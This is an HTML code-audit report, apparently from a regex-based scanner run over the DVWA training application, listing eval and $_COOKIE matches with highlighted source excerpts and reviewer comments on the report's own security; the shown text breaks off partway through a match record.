<!doctype html>
<html>
<head>
  <meta charset='utf-8'>
  <title>DVWA</title>
  
  <!--
    Third-party stylesheets: Primer and the Prism "solarized light" theme
    (the code excerpts in the match data use Prism's "token" classes).
    NOTE(review): neither link carries an integrity attribute, so the report
    trusts whatever the CDN serves at view time. Pin the files with
    Subresource Integrity (integrity='sha384-HASH_OF_THE_PINNED_FILE'
    crossorigin='anonymous'; the hash shown is a placeholder) or ship the CSS
    alongside the report, which also lets it render offline.
  -->
  <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/Primer/3.0.1/css/primer.css'>
  
  <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/themes/prism-solarizedlight.min.css'>
  
  <style>
  /*
   * Stylesheet for the scan report. Visibility is driven by classes and
   * attributes: the :class binding on #app toggles nomatches, showOk,
   * showWarn, showCritical and showUnknown, and every match carries a
   * data-severity attribute. Matches are hidden by default and revealed only
   * while the class for their severity is present on #app.
   */
  /* colors */
/* highlighter helper function */
/* NOTE(review): the two headings above and the comment-only rule sets further
   down emit no styles; presumably they are leftovers of a preprocessor source
   (variables, a helper, nested rules). */
/* hide the notification headers by default */
header#no-matches,
header#rendering {
  display: none;
}
/* applied while vue.js is rendering (Vue removes the v-cloak attribute once
   it has compiled the element) */
#app[v-cloak] {
  /* hide sidebar and "matches" space */
  /* display a blankslate notification */
}
#app[v-cloak] aside,
#app[v-cloak] main {
  display: none;
}
#app[v-cloak] header#rendering {
  display: block;
}
/* applied when no matches are found (the nomatches class is bound to
   matches.length === 0 on #app) */
#app.nomatches {
  /* hide sidebar and "matches" space */
  /* display a blankslate notification */
}
#app.nomatches aside,
#app.nomatches main {
  display: none;
}
#app.nomatches header#no-matches {
  display: block;
}
/* sidebar: severity links are greyed out unless their filter is switched on */
aside li a[data-severity] {
  color: silver;
}
/* sidebar severity filters: one colour per severity, inverted on hover */
#app.showOk aside a[data-severity=ok] {
  color: #4078c0;
}
#app.showOk aside a[data-severity=ok]:hover {
  background-color: #4078c0;
  color: white;
}
#app.showWarn aside a[data-severity=warn] {
  color: orange;
}
#app.showWarn aside a[data-severity=warn]:hover {
  background-color: orange;
  color: white;
}
#app.showCritical aside a[data-severity=critical] {
  color: #bd2c00;
}
#app.showCritical aside a[data-severity=critical]:hover {
  background-color: #bd2c00;
  color: white;
}
#app.showUnknown aside a[data-severity=unknown] {
  color: #767676;
}
#app.showUnknown aside a[data-severity=unknown]:hover {
  background-color: #767676;
  color: white;
}
/* matches: shown only while the filter for their severity is on
   (div.match is display: none by default, see below) */
#app.showOk div.match[data-severity=ok],
#app.showWarn div.match[data-severity=warn],
#app.showCritical div.match[data-severity=critical],
#app.showUnknown div.match[data-severity=unknown] {
  display: block;
}
/* collapsed section: heading greyed out, matches hidden. data-show starts as
   'true' in the markup; presumably the hideSection handler flips it (the
   handler is not part of this stylesheet). */
#app main section[data-show='false'] h2 {
  color: silver;
}
#app main section[data-show='false'] div.match {
  /* !important is needed because the show* rules above are more specific
     (one more class/attribute selector) and would otherwise win */
  display: none !important;
  /* kludge */
}
#app main section a.show-hide {
  cursor: pointer;
  float: right;
  font-size: small;
  font-weight: normal;
}
/* a single match: hidden until a severity filter reveals it */
div.match {
  border-left: 1px solid white;
  display: none;
  /* apply background colors by severity */
  /* heading */
  /* code blocks */
  /* user notes */
}
div.match:hover {
  border-left: 1px solid #e5e5e5;
}
div.match[data-severity=ok] {
  background-color: #f2f8fa;
  /* hide code samples and notes for "ok" severity matches */
}
div.match[data-severity=ok] code,
div.match[data-severity=ok] textarea {
  display: none;
}
div.match[data-severity=warn] {
  background-color: lightyellow;
}
div.match[data-severity=critical] {
  background-color: #ffccbd;
}
div.match span.match-id {
  float: left;
}
/* heading: file path and line number of the match */
div.match h3 {
  color: darkgray;
  font-family: monospace;
  font-size: small;
  font-weight: normal;
}
div.match h3 span.line-number {
  color: #55a532;
  font-weight: bold;
}
/* code excerpt: whitespace is preserved and long lines scroll horizontally */
div.match code {
  padding: 1rem;
  background-color: #f7f7f7;
  display: block;
  overflow-x: scroll;
  white-space: pre;
}
div.match code span.line-number {
  color: #999;
  padding-right: 1rem;
}
/* the line that matched the search pattern, highlighted across the full width */
div.match code span.highlight {
  background-color: yellow;
  display: inline-block;
  min-width: 100%;
}
/* reviewer notes */
div.match textarea {
  color: #666;
  border: 1px solid #efefef;
  margin-top: 0.5rem;
  width: 100%;
}
/* match severity buttons */
p.severity {
  text-align: right;
}
p.severity a {
  background-color: white;
  border: 1px solid #e5e5e5;
  padding: 2px 10px;
}
p.severity a:hover {
  cursor: pointer;
  text-decoration: none;
}
/* the "unknown" button is hidden on screen (in the match template it has no
   click handler); the print rules below show it as a label */
p.severity a[data-severity=unknown] {
  display: none;
  color: silver;
}
p.severity a[data-severity=ok] {
  color: #4078c0;
}
p.severity a[data-severity=ok]:hover {
  border: 1px solid #4078c0;
  background-color: #4078c0;
  color: white;
}
p.severity a[data-severity=warn] {
  color: orange;
}
p.severity a[data-severity=warn]:hover {
  border: 1px solid orange;
  background-color: orange;
  color: white;
}
p.severity a[data-severity=critical] {
  color: #bd2c00;
}
p.severity a[data-severity=critical]:hover {
  border: 1px solid #bd2c00;
  background-color: #bd2c00;
  color: white;
}
/* the button matching the current severity of a match is drawn filled in */
.match[data-severity=ok] p.severity a[data-severity=ok] {
  background-color: #4078c0;
  color: white;
  border: 1px solid #4078c0;
}
.match[data-severity=warn] p.severity a[data-severity=warn] {
  background-color: orange;
  color: white;
  border: 1px solid orange;
}
.match[data-severity=critical] p.severity a[data-severity=critical] {
  background-color: #bd2c00;
  color: white;
  border: 1px solid #bd2c00;
}
/* print stylesheet */
@media print {
  /* hide the navigation */
  aside {
    display: none;
  }
  /* go full-width */
  main.three-fourths.column {
    margin: 0 auto;
    width: 100%;
  }
  /* hide the "show/hide" links */
  section h2 a.show-hide {
    display: none;
  }
  /* hide sections marked as "hidden" */
  section[data-show='false'] {
    display: none;
  }
  /* match style */
  .match {
    /* don't break match divs */
    /* @BUG: this seems poorly supported in Chrome :( */
    break-inside: avoid;
    /* hide the scrollbars */
    /* hide borders */
  }
  .match code {
    /* keep the excerpt background when printing.
       NOTE(review): only the -webkit- prefixed form is set; the standard
       property is print-color-adjust. */
    -webkit-print-color-adjust: exact;
    overflow-x: hidden;
  }
  .match textarea {
    border: none;
    /* hide textareas that contain no notes */
  }
  .match textarea:placeholder-shown {
    display: none;
  }
  /* hide the "severity" buttons */
  .match p.severity a {
    display: none;
    border: none;
  }
  /* ... except for one serving as a label */
  .match[data-severity='ok'] a[data-severity='ok'],
  .match[data-severity='warn'] a[data-severity='warn'],
  .match[data-severity='critical'] a[data-severity='critical'],
  .match[data-severity='unknown'] a[data-severity='unknown'] {
    -webkit-print-color-adjust: exact;
    display: inline-block;
  }
  /* DO show "ok" matches on the PDF */
  .match[data-severity='ok'] code,
  .match[data-severity='ok'] textarea {
    display: block !important;
    /* kludge */
  }
}

  </style>
</head>
<body class='container'>

  <!-- Report heading: the name shown for the scanned project and a timestamp
       (presumably the time the report was generated). -->
  <header class='blankslate blankslate-clean-background'>
    <h1>DVWA</h1>
    <p class='text-gray'>20 June 2017, 10:29 AM</p>
  </header>

  <!--
    Root of the interactive report; presumably the element the Vue instance
    from the inline script mounts on. The :class binding adds the nomatches,
    showOk, showWarn, showCritical and showUnknown classes that the stylesheet
    keys its visibility rules on. v-cloak keeps the sidebar and the matches
    hidden until Vue has compiled the markup and removed the attribute.
    Text interpolations inside this element are HTML-escaped by Vue, so file
    types, severities and search patterns are rendered as plain text.
  -->
  <div
    id='app'
    class='columns'
    :class='{
      nomatches    : matches.length === 0,
      showOk       : show.ok,
      showWarn     : show.warn,
      showCritical : show.critical,
      showUnknown  : show.unknown,
    }'
    v-cloak>

    <!-- "rendering" notice: shown by the stylesheet only while v-cloak is present -->
    <header id='rendering' class='blankslate'>
      <h2>Rendering...</h2>
      Large documents may take a moment to render.
    </header>

    <!-- "no matches" notice: shown by the stylesheet only while #app has the nomatches class -->
    <header id='no-matches' class='blankslate' v-cloak>
      <h2>No Matches</h2>
      The scanned files match no signatures.
    </header>

    <aside class='one-fourth column'>
    
      <!-- filetype filter: each entry of filetypes is a [name, count] pair;
           the entry equal to filetype gets the selected class -->
      <!-- NOTE(review): the filter links below have no href, so they cannot be
           reached or activated from the keyboard; their click handlers
           (filterFiletype, filterSeverity) are defined outside this markup -->
      <p class='text-gray'>Filetype:</p>
      <ul class='filter-list mb-5'>
        <li v-for='pair in filetypes'>
          <a 
            @click='filterFiletype'
            :data-filetype='pair[0]'
            :class='{ selected: filetype === pair[0] }'
            class='filter-item'>
            <span class='count'>{{ pair[1] }}</span>
            {{ pair[0] }}
          </a>
        </li>
      </ul>

      <!-- severity filter: one toggle per entry of severities; the colours
           come from the data-severity rules in the stylesheet -->
      <p class='text-gray'>Severity:</p>
      <ul class='filter-list mb-5'>
        <li v-for='severity in severities'>
          <a
            @click='filterSeverity'
            :data-severity='severity'
            class='filter-item active'>
            {{ severity }}
          </a>
        </li>
      </ul>

       <!-- match navigation: one link per entry of filteredSearches, pointing
            at the fragment "#" + search.search and showing its match count.
            NOTE(review): v-once renders this list a single time, so it will
            not follow later changes to filteredSearches; confirm that is
            intended. The fragment is the raw search pattern (a regular
            expression in the match data), used verbatim as an anchor name. -->
      <nav class='menu'>
        <span class='menu-heading'>Matches</span>
        <a v-once v-for='search in filteredSearches'
          :href='"#" + search.search'
          class='menu-item'>
          <code>{{ search.search }}</code>
          <span class='counter'>{{ search.count }}</span>
        </a>
      </nav>

    </aside>

    <main class='three-fourths column'>

      <!-- match groups: each group is a pair; group[0] is the heading and the
           anchor name the sidebar links target (presumably the search
           pattern), group[1] is the list of matches. data-show starts as
           'true'; the stylesheet collapses a section when it is 'false'
           (presumably set by hideSection, which is not visible here) -->
      <section v-for='group in groups' data-show='true'>
        <a :name='group[0]'></a>
        <h2 class='border-bottom p-3'>{{ group[0] }}
          <a class='show-hide' @click='hideSection'>Hide</a>
        </h2>

        <!-- matches: one matches component per match, keyed by match.id; both
             the annotate and the severity events are routed to save, which is
             defined outside this markup -->
        <matches
          v-for='match in group[1]'
          :key='match.id'
          :match='match'
          v-on:annotate='save'
          v-on:severity='save'
        ></matches>
      </section>

    </main>
  </div>

  <!--
    match template: markup for a single finding (presumably the template of
    the matches component used inside #app).

    Shows the match id, three severity buttons, the file and line, the code
    excerpt and a notes field. The data-severity attribute on the root div is
    what the stylesheet uses to colour, show or hide the match.

    SECURITY: match.match is inserted with v-html, that is, as raw HTML with
    no escaping by Vue. The match data in this file holds pre-highlighted
    markup (line-number, token and highlight spans) built from the scanned
    source files, which are untrusted input for a report like this. The report
    generator therefore has to HTML-escape the code text before wrapping it in
    spans; anything left unescaped is interpreted by the browser of whoever
    opens the report. NOTE(review): the visible data contains a bare ">"
    inside a token span, which is harmless on its own but is a reason to
    confirm that "<" and "&" are escaped by the generator.

    match.id, match.file, match.line and the button labels use text
    interpolation, which Vue escapes. match.file is printed verbatim; the data
    in this file holds absolute paths from the scanning machine (including a
    home directory), which is worth keeping in mind before sharing a report.

    The "unknown" button has no click handler, so a match cannot be reset to
    unknown from the UI. The notes textarea is bound with v-model and calls
    annotate() on change; the interpolation between the textarea tags looks
    redundant next to v-model (TODO confirm).
  -->
  <template id='match'>
    <div class='match p-3' :data-severity='match.severity'>
      <span class='match-id text-gray'>ID: {{ match.id }}</span>
      <p class='severity'>
        <a data-severity='unknown'>unknown</a>
        <a data-severity='ok'       @click='severity("ok")'>ok</a>
        <a data-severity='warn'     @click='severity("warn")'>warn</a>
        <a data-severity='critical' @click='severity("critical")'>critical</a>
      </p>
      <h3>{{ match.file }}:<span class='line-number'>{{ match.line }}</span></h3>
      <code v-html='match.match'></code>
      <textarea
        placeholder='Notes'
        v-model='match.note'
        v-on:change='annotate()'>{{ match.note }}</textarea>
    </div>
  </template>

  
  <!--
    Third-party libraries: Vue 2.2.4 and lodash 4.17.4, loaded from a CDN.
    NOTE(review): neither script tag carries an integrity attribute. These
    scripts run with full access to the report, including every code excerpt
    and reviewer note, so a modified file served from the CDN would run with
    that same access. Pin them with Subresource Integrity
    (integrity='sha384-HASH_OF_THE_PINNED_FILE' crossorigin='anonymous'; the
    hash shown is a placeholder) or ship the files alongside the report,
    which also lets it work offline.
    The type attribute is optional here: text/javascript is the default.
  -->
  <script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.2.4/vue.min.js'></script>
  
  <script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/lodash.js/4.17.4/lodash.min.js'></script>
  
  <script type='text/javascript'>
    var filetype   = 'all';
    var filetypes  = [
 [
  "all",
  311
 ],
 [
  "js",
  1
 ],
 [
  "php",
  310
 ]
];
    var matches    = [
 {
  "id": 37,
  "file": "/home/chris/src/DVWA-master/dvwa/js/dvwaPage.js",
  "filetype": "js",
  "search": "\\seval\\s*\\(",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">/</span><span class=\"token operator\">*</span> Help popup <span class=\"token operator\">*</span><span class=\"token operator\">/</span>\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> function <span class=\"token function\">popUp</span><span class=\"token punctuation\">(</span>URL<span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \tday <span class=\"token operator\">=</span> new <span class=\"token function\">Date</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">5:</span> \tid <span class=\"token operator\">=</span> day<span class=\"token punctuation\">.</span><span class=\"token function\">getTime</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token function\">eval</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"page\"</span> <span class=\"token operator\">+</span> id <span class=\"token operator\">+</span> <span class=\"token string\">\" = window.open(URL, '\"</span> <span class=\"token operator\">+</span> id <span class=\"token operator\">+</span> \"<span class=\"token string\">', '</span>toolbar<span class=\"token operator\">=</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span>scrollbars<span class=\"token operator\">=</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span>location<span class=\"token operator\">=</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span>statusbar<span class=\"token operator\">=</span><span class=\"token number\">0</span><span class=\"token 
punctuation\">,</span>menubar<span class=\"token operator\">=</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span>resizable<span class=\"token operator\">=</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span>width<span class=\"token operator\">=</span><span class=\"token number\">500</span><span class=\"token punctuation\">,</span>height<span class=\"token operator\">=</span><span class=\"token number\">300</span><span class=\"token punctuation\">,</span>left <span class=\"token operator\">=</span> <span class=\"token number\">540</span><span class=\"token punctuation\">,</span>top <span class=\"token operator\">=</span> <span class=\"token number\">250</span>'<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\");</span></span>\n<span class=\"line-number\">7:</span> }\n<span class=\"line-number\">8:</span> \n<span class=\"line-number\">9:</span> <span class=\"token operator\">/</span><span class=\"token operator\">*</span> Form validation <span class=\"token operator\">*</span><span class=\"token operator\">/</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> function <span class=\"token function\">validate_required</span><span class=\"token punctuation\">(</span>field<span class=\"token punctuation\">,</span>alerttxt<span class=\"token punctuation\">)</span>",
  "line": 6,
  "start": 1,
  "end": 12,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 14,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$html</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> }\n<span class=\"line-number\">18:</span> \n<span class=\"line-number\">19:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Valid security levels\n<span class=\"line-number\">20:</span> <span class=\"token variable\">$security_levels</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span><span class=\"token string\">'low'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'high'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'impossible'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">21:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> || !<span class=\"token function\">in_array</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$security_levels</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> 
{</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Set security cookie <span class=\"token keyword\">to</span> impossible <span class=\"token keyword\">if</span> no cookie exists\n<span class=\"line-number\">23:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">in_array</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'default_security_level'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$security_levels</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">24:</span> \t\t<span class=\"token function\">dvwaSecurityLevelSet</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'default_security_level'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \t}\n<span class=\"line-number\">26:</span> \t<span class=\"token keyword\">else</span> {",
  "line": 21,
  "start": 16,
  "end": 27,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 15,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">127:</span> \treturn <span class=\"token variable\">$returnArray</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">128:</span> }\n<span class=\"line-number\">129:</span> \n<span class=\"line-number\">130:</span> \n<span class=\"line-number\">131:</span> function <span class=\"token function\">dvwaSecurityLevelGet</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">132:</span> \treturn <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">'impossible'</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">133:</span> }\n<span class=\"line-number\">134:</span> \n<span class=\"line-number\">135:</span> \n<span class=\"line-number\">136:</span> function <span class=\"token function\">dvwaSecurityLevelSet</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pSecurityLevel</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">137:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pSecurityLevel</span> <span class=\"token operator\">==</span> <span class=\"token string\">'impossible'</span> <span class=\"token punctuation\">)</span> {",
  "line": 132,
  "start": 127,
  "end": 138,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 31,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">60:</span> \t\t<span class=\"token operator\">*</span><span class=\"token operator\">/</span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$request</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>\n<span class=\"line-number\">62:</span> \t\t\t<span class=\"token string\">'REQUEST'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">63:</span> \t\t\t<span class=\"token string\">'GET'</span>     <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">64:</span> \t\t\t<span class=\"token string\">'POST'</span>    <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">65:</span> \t\t\t<span class=\"token string\">'COOKIE'</span>  <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_COOKIE</span></span>\n<span class=\"line-number\">66:</span> \t\t<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">67:</span> \n<span class=\"line-number\">68:</span> \t\t<span class=\"token variable\">$init</span> <span class=\"token operator\">=</span> IDS_Init<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token function\">init</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_PHPIDS <span class=\"token punctuation\">.</span> <span class=\"token string\">'lib/IDS/Config/Config.ini'</span> 
<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">69:</span> \n<span class=\"line-number\">70:</span> \t\t<span class=\"token variable\">$init</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>config<span class=\"token punctuation\">[</span> <span class=\"token string\">'General'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'base_path'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_PHPIDS <span class=\"token punctuation\">.</span> <span class=\"token string\">'lib/IDS/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 65,
  "start": 60,
  "end": 71,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 62,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/index.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'brute'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> <span class=\"token variable\">$method</span>            <span class=\"token operator\">=</span> <span class=\"token string\">'GET'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token 
comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 17,
  "start": 12,
  "end": 23,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 90,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/index.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">13:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'captcha'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token 
punctuation\">:</span>\n<span class=\"line-number\">23:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 18,
  "start": 13,
  "end": 24,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 141,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/index.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'csrf'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token 
punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 17,
  "start": 12,
  "end": 23,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 172,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/index.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
